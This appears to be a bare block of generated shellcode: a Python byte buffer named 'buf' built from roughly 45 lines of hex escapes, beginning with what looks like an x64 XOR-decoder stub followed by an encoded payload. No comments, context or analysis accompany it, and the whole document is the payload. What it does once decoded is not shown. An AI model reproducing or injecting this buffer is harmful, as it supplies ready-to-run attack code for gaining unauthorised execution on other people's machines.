buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x96\xf2\x62\x98\x8e\x9e\xd6"
buf += b"\xa6\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x6a\xba\xe1\x7c\x7e\x76\x1a\xa6\x96\xf2\x23\xc9\xcf"
buf += b"\xce\x84\xf7\xc0\xba\x53\x4a\xeb\xd6\x5d\xf4\xf6\xba"
buf += b"\xe9\xca\x96\xd6\x5d\xf4\xb6\xba\xe9\xea\xde\xd6\xd9"
buf += b"\x11\xdc\xb8\x2f\xa9\x47\xd6\xe7\x66\x3a\xce\x03\xe4"
buf += b"\x8c\xb2\xf6\xe7\x57\x3b\x6f\xd9\x8f\x5f\x34\x4b\xc4"
buf += b"\xb3\x33\xd0\x05\xcc\xf6\x2d\xd4\xce\x2a\x99\x5e\xf8"
buf += b"\x57\xde\x8e\xf9\x60\x97\x0b\xec\xd6\xa6\x96\x79\xe2"
buf += b"\x10\x8e\x9e\xd6\xee\x13\x32\x16\xff\xc6\x9f\x06\xf6"
buf += b"\x1d\xba\x7a\xdc\x05\xde\xf6\xef\x97\x22\x81\xce\xc6"
buf += b"\x61\x1f\xe7\x1d\xc6\xea\xd0\x8f\x48\x9b\x97\x5f\xba"
buf += b"\x53\x58\x22\xdf\x17\x6f\x9b\xb3\x63\x59\xb6\x7e\xa3"
buf += b"\x57\xda\xf1\x2e\xbc\x86\xdb\xef\x77\xe3\x2a\x3a\xdc"
buf += b"\x05\xde\xf2\xef\x97\x22\x04\xd9\x05\x92\x9e\xe2\x1d"
buf += b"\xb2\x7e\xd1\x8f\x4e\x97\x2d\x92\x7a\x2a\x99\x5e\xdf"
buf += b"\x8e\xe7\xce\xac\x3b\xc2\xcf\xc6\x97\xff\xd7\xa8\x2a"
buf += b"\x1b\x62\xbe\x97\xf4\x69\x12\x3a\xd9\xd7\xc4\x9e\x2d"
buf += b"\x84\x1b\x29\x67\x71\x61\x8b\xef\x28\x85\x11\xaa\xd1"
buf += b"\xad\xe4\xa6\x96\xb3\x34\xd1\x07\x78\x9e\x27\x7a\x52"
buf += b"\x63\x98\x8e\xd7\x5f\x43\xdf\x4e\x60\x98\xad\xb7\xdc"
buf += b"\xad\x91\x22\x23\xcc\xc7\x17\x32\xea\x1f\x03\x23\x22"
buf += b"\xc2\xe9\xf0\xa1\x69\x27\x2e\x11\x64\xf6\xd7\xa7\x96"
buf += b"\xf2\x3b\xd9\x34\xb7\x56\xcd\x96\x0d\xb7\xf2\x84\xdf"
buf += b"\x88\xf6\xc6\xbf\x53\x51\xc3\xaf\x16\xee\x69\x32\x2a"
buf += b"\x11\x4c\xd6\x29\x66\xde\x7b\xa3\xd9\x34\x74\xd9\x79"
buf += b"\x76\x0d\xb7\xd0\x07\x59\xbc\xb6\xd7\xaa\x2e\x11\x6c"
buf += b"\xd6\x5f\x5f\xd7\x48\xfb\x3d\xfa\xff\x29\x73\x13\x32"
buf += b"\x16\x92\xc7\x61\x18\xd3\x73\x1a\xf1\x98\x8e\x9e\x9e"
buf += b"\x25\x7a\xe2\x2a\x11\x6c\xd3\xe7\x6f\xfc\xf6\x23\xc0"
buf += b"\xc6\x17\x2f\xe7\x2c\xf0\xbb\x50\xd1\x61\x03\x25\x6e"
buf += b"\xf2\x1c\xcd\xc6\x1d\x12\x86\xc8\x7b\x94\xf2\xce\xdf"
buf += b"\x8f\xce\x96\xe2\x62\x98\xcf\xc6\x9e\x2f\x64\xba\x53"
buf += b"\x51\xcf\x24\x8e\x02\xc5\x17\x9d\x4d\xc6\x17\x15\xef"
buf += b"\x1f\x35\x2f\xa9\x47\xd7\x5f\x56\xde\x7b\xb8\xd0\x07"
buf += b"\x67\x97\x1c\x94\x2b\xaa\xc7\x71\x4b\x55\x5e\x96\x8f"
buf += b"\x4a\xc0\xcf\xc9\x8f\xce\x96\xb2\x62\x98\xcf\xc6\xbc"
buf += b"\xa6\xcc\xb3\xd8\x93\xa1\x91\xe6\x59\x43\xa5\x3b\xd9"
buf += b"\x34\xeb\xb8\xeb\xf7\x0d\xb7\xd1\x71\x50\x3f\x9a\x69"
buf += b"\x0d\x9d\xd0\x8f\x5d\x9e\x8f\x50\xba\xe7\x6e\xfb\x2a"
buf += b"\x97\x59\x71\xaa\x08\x98\xd7\xd7\x11\x64\x66\x47\xc0"
buf += b"\xce\x71\x4b\xd6\xa6"
